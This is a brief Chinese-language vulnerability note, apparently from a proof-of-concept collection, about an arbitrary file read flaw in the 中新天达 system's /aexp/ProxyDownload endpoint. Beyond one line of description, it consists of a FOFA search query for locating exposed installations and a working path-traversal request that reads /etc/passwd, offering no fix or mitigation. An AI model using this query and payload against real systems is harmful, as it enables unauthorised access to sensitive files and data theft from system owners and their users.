中新天达系统存在任意文件读取漏洞

中新天达系统/aexp/ProxyDownload存在任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。

fofa

body="aexp/ValidateImage"

/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd